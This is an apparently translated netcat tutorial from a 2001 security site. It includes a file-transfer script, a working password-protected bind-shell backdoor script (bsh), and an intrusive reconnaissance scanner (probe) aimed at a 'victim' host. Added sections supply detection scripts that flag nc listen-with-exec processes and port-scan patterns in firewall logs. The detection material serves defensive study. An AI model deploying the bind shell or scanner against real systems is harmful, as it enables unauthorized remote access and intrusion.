NC usage skills


Create time: 2001-03-02

Article attribute: original

Article submission:

Quack (QUACK_AT_XFOCUS.ORG)

By QUACK

http://www.xfocus.org Security Focus

Everyone should be familiar with this little tool, nc; it has been around for n years already. I will not waste words here, and will just go through some of its tricks together with a few scripts.

(The scripts discussed in this article come from the NC110.TGZ package.)

1. Basic usage

quack# nc -h
[v1.10]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
  -e prog     program to execute once a connection is made [dangerous!!]
  -g gateway  source-routing hop point(s), up to 8
  -G num      source-routing pointer: 4, 8, 12, ...
  -h          this help text
  -i secs     delay interval between lines sent or ports scanned
  -l          listen mode, for inbound connections
  -n          numeric-only IP addresses, no hostname lookups
  -o file     hex dump of the traffic to file
  -p port     local port number
  -r          randomize local and remote ports
  -s addr     local source address
  -u          UDP mode
  -v          verbose output; give -v twice for more detail
  -w secs     timeout for connects and final net reads
  -z          zero-I/O mode, used for scanning
port numbers can be individual or ranges: lo-hi (inclusive)

2. Transferring files: ncp

#! /bin/sh
## Similar to rcp, but uses netcat on a high port.
## Run "ncp targetfile" on the machine that receives the file.
## Then run "ncp sourcefile receivinghost" on the machine that sends it.
## If invoked as "nzp", the transferred data is compressed.

## Here you define the port to use; pick any you like.
MYPORT=23456

## If nc is not in the system PATH, uncomment the following line and adjust it.
# PATH=${HOME}:${PATH} ; export PATH

## The following lines check the arguments.
test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed 's+.*/++'`
test "$me" = "nzp" && echo '[compressed mode]'

# if there is a second arg, it's a host to send an [extant] file to.
if test "$2" ; then
  test ! -f "$1" && echo "can't find $1" && exit 1
  if test "$me" = "nzp" ; then
    compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
  else
    nc -v -w 2 $2 $MYPORT < "$1" && exit 0
  fi
  echo "transfer FAILED!"
  exit 1
fi

# otherwise we are receiving: don't overwrite a file of the same name
# in the current directory of the receiving machine
if test -f "$1" ; then
  echo -n "Overwrite $1? "
  read aa
  test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
  # note the usage here: a redirect and a pipeline combined
  nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
  nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1

In this case, on machine A I simply run

quacka# ncp ../abcd
listening on [any] 23456 ...

and then on another machine, B:

quackb# ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?)

Meanwhile, on machine A you see:

connect to [192.168.0.2] from quackb [192.168.0.1] 1027
#

Check it: the file has been transferred.

3. Binding a shell to a port: bsh

First of all, if you compile netcat with nothing more than a plain "make freebsd" or the like, this script will not work: the -e option is only provided when GAPING_SECURITY_HOLE is defined at compile time.

#! /bin/sh
## a script that binds a shell to a port with nc, with password protection
## takes one argument, the port number

NC=nc

case "$1" in
  ?*)
    LPN="$1"
    export LPN
    sleep 1
    # note the nc options here: -l is listen, -e runs the program on the connection
    echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
    echo "launched on port $LPN"
    exit 0
  ;;
esac

# here we play inetd: respawn the listener for the next connection
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
while read qq ; do
  case "$qq" in
    # this is only weak password protection; the password is quack
    quack)
      cd /
      exec csh -i
    ;;
  esac
done

How is it used?

quack# ./bsh 6666          <------- typed; what follows is the program's output
-l -p 6666 -e ./bsh
launched on port 6666
quack#
quack# nc localhost 6666   <------- typed
-l -p 6666 -e ./bsh
quack                      <------- typed: the password check
Warning: imported path contains relative components
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
cracker#
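Seen from the other side, what is worth spotting on a host is exactly the process that bsh leaves behind: an nc listening (-l) with a program attached (-e). The following is an added example, not code from the article or from the nc110.tgz package. It reads process command lines in the form "ps -eo args" prints them and flags the nc/netcat/ncat invocations that combine a listen option with an exec option. The process list it runs on is a constructed sample (two lines mirror the session above), and the function names flag_nc_listeners and count_nc_listeners are my own.

```shell
#!/bin/sh
# Added example (not part of the article or of nc110.tgz): find netcat
# processes that combine listening (-l) with command execution (-e), which is
# what bsh above leaves running.  Input is one process command line per line,
# as "ps -eo args" prints it.

# Constructed sample of "ps -eo args" output.  Two lines mirror the article's
# bsh session; the rest are benign processes that must not be flagged.
SAMPLE_PS='/sbin/init
nc -l -p 6666 -e ./bsh
nc -v -w 30 -p 23456 -l
/usr/sbin/sshd -D
ncat --listen 4444 --exec /bin/sh
nc -z -w 2 192.168.0.2 23456
nc -l -p 8080 -e /bin/sh'

# Print every command line whose program is nc/netcat/ncat and that carries
# both a listen option and a program-execution option.
flag_nc_listeners() {
  awk '
    {
      # program name without its directory part
      prog = $1; sub(/.*\//, "", prog)
      if (prog != "nc" && prog != "netcat" && prog != "ncat") next
      listen = 0; execflag = 0
      for (i = 2; i <= NF; i++) {
        if ($i == "-l" || $i == "--listen") listen = 1
        # -e/-c are the nc110 and nc.traditional spellings, --exec/--sh-exec
        # the ncat ones (OpenBSD nc uses -c for TLS, so expect a false
        # positive on that variant)
        if ($i == "-e" || $i == "-c" || $i == "--exec" || $i == "--sh-exec" ||
            $i ~ /^--(exec|sh-exec)=/) execflag = 1
      }
      if (listen && execflag) print
    }'
}

# Number of flagged lines in the constructed sample (3 of the 7).
count_nc_listeners() {
  printf '%s\n' "$SAMPLE_PS" | flag_nc_listeners | wc -l | tr -d ' '
}

# stand-alone run: list the suspicious command lines of the sample
printf '%s\n' "$SAMPLE_PS" | flag_nc_listeners
```

Feed it live data with "ps -eo args | flag_nc_listeners". It only catches the plain pattern: a renamed copy of nc, or one started through "sh -c", evades it, so cross-check the listening sockets themselves (netstat -lntp or ss -lntp). The cleaner fix is the one the compile note above implies: build nc without GAPING_SECURITY_HOLE and the -e option simply is not there.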

4. Port scanning: probe

Among the port scanners we commonly see, some, VeteScan for example, are written in shell script, and many of them require netcat to be installed on the system. Why is that? Look at the script below and you may understand a bit.

#! /bin/sh
## launch a whole buncha shit at yon victim in no particular order; capture
## stderr stdout in one place.  Run as root for rservice and low -p to work.
## fairly thorough example of using netcat to collect a lot of host info.
## Will set off every intrusion alarm in existence on a paranoid machine!

# some of the gadgets live in this directory
DDIR=../data
# specify a gateway
GATE=192.157.69.11
# might conceivably wanna change this for different run styles
UCMD='nc -v -w 8'

test ! "$1" && echo Needs victim arg && exit 1

echo '' | $UCMD -w 9 -r "$1" 13 79 6667 2>&1
echo '0' | $UCMD "$1" 79 2>&1
# if lsrr was passed thru, should get refusal here:
# watch this one; these nc options can in fact do a great deal
$UCMD -z -r -g $GATE "$1" 6473 2>&1
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1
# -s `hostname` may be wrong for some multihomed machines
echo 'UDP echoecho!' | nc -u -p 7 -s `hostname` -w 3 "$1" 7 19 2>&1
echo '113,10158' | $UCMD -p 10158 "$1" 113 2>&1
rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1
# newline after any telnet trash
echo ''
echo PASV | $UCMD -r "$1" 21 2>&1
echo 'GET /' | $UCMD -w 10 "$1" 80 81 210 70 2>&1
# sometimes contains useful directory info:
# you know what robots.txt is, right? ;)
echo 'GET /robots.txt' | $UCMD -w 10 "$1" 80 2>&1
# now the big red lights go on
# try the rservice gadget, which you can find in the data directory of nc110.tgz
rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1
rservice root root | $UCMD -r "$1" exec 2>&1
echo 'begin big udp -- everything may look "open" if packet-filtered'
data -g < ${DDIR}/nfs-0.d | $UCMD -i 1 -u "$1" 2049 | od -x 2>&1
# no wait-time, uses RTT hack
nc -v -z -u -r "$1" 111 66-70 88 53 87 161-164 121-123 213 49 2>&1
nc -v -z -u -r "$1" 137-140 694-712 747-770 175-180 2103 510-530 2>&1
echo 'end big udp'
$UCMD -r -z "$1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2>&1
# use our identd-sniffer!
iscan "$1" 21 25 79 80 111 53 6667 6000 2049 119 2>&1
# this gets pretty intrusive, but what the fuck.  probe for portmap first
if nc -w 5 -z -u "$1" 111 ; then
  # using showmount and rpcinfo here may well get you caught ;)
  showmount -e "$1" 2>&1
  rpcinfo -p "$1" 2>&1
fi
exit 0

There is really nothing more to say; the script explains itself. Of course, the script above is only an illustrative example. When you actually use it, a scan like this leaves a great many traces, and the system administrator will be on the alert ;)

Try more and think more, and you may find more uses for it. Have a look at the scripts in the scripts directory of nc110.tgz and pick up some ideas from them.
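The traces mentioned above are easy to pick up in a packet-filter log, because probe touches dozens of distinct ports on one host from one source within a few seconds. The following is an added example, not code from the article or from nc110.tgz: it counts distinct destination ports per source in netfilter LOG lines and reports every source above a threshold. The log lines are a constructed sample (the ports are taken from the script above), and scan_sources is my own function name.

```shell
#!/bin/sh
# Added example (not from the article or nc110.tgz): spot the kind of trace a
# run of probe leaves in a packet-filter log.  One source hitting many
# different destination ports in a short window is the signature, so this
# counts distinct DPT values per SRC and reports sources over a threshold.
# Input is the iptables/netfilter LOG line format; other firewalls need only
# the SRC=/DPT= tokens adapted.

# Constructed sample: 192.168.0.1 runs probe against 192.168.0.2 (ports from
# the script above, 111 twice); 10.0.0.5 is ordinary web traffic and must
# not be reported.
SAMPLE_LOG='Mar  2 10:00:01 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1027 DPT=13 SYN
Mar  2 10:00:01 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1028 DPT=79 SYN
Mar  2 10:00:01 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1029 DPT=6667 SYN
Mar  2 10:00:02 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1030 DPT=6473 SYN
Mar  2 10:00:02 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1031 DPT=6000 SYN
Mar  2 10:00:02 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1032 DPT=111 SYN
Mar  2 10:00:03 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=UDP SPT=1033 DPT=53
Mar  2 10:00:03 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=UDP SPT=1034 DPT=2049
Mar  2 10:00:03 quacka kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.2 PROTO=TCP SPT=1035 DPT=111 SYN
Mar  2 10:00:04 quacka kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.0.2 PROTO=TCP SPT=40001 DPT=80 SYN
Mar  2 10:00:05 quacka kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.168.0.2 PROTO=TCP SPT=40002 DPT=80 SYN'

# scan_sources THRESHOLD: read log lines on stdin and print "SRC count" for
# every source that touched at least THRESHOLD distinct destination ports.
scan_sources() {
  awk -v thr="$1" '
    {
      src = ""; dpt = ""
      for (i = 1; i <= NF; i++) {
        if ($i ~ /^SRC=/) src = substr($i, 5)
        if ($i ~ /^DPT=/) dpt = substr($i, 5)
      }
      if (src == "" || dpt == "") next
      # count each (source, port) pair once, however many packets it sent
      key = src SUBSEP dpt
      if (!(key in seen)) { seen[key] = 1; ports[src]++ }
    }
    END { for (s in ports) if (ports[s] >= thr) print s, ports[s] }' | sort
}

# stand-alone run over the sample: reports "192.168.0.1 8"
printf '%s\n' "$SAMPLE_LOG" | scan_sources 5
```

Over real data it is run as, for instance, "grep 'DPT=' /var/log/kern.log | scan_sources 20" (the path and threshold are assumptions; tune them for the site). Because it counts distinct ports rather than packets, the -r randomization and the -z zero-I/O connects in probe do not change the result, and the UDP probes land in the same count. The fixed low source ports the script uses (-p 7, 1019 and 1020) are a second hook worth alerting on, in the SPT field.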

When reposting, please cite the original address: https://www.9cbs.com/read-124653.html
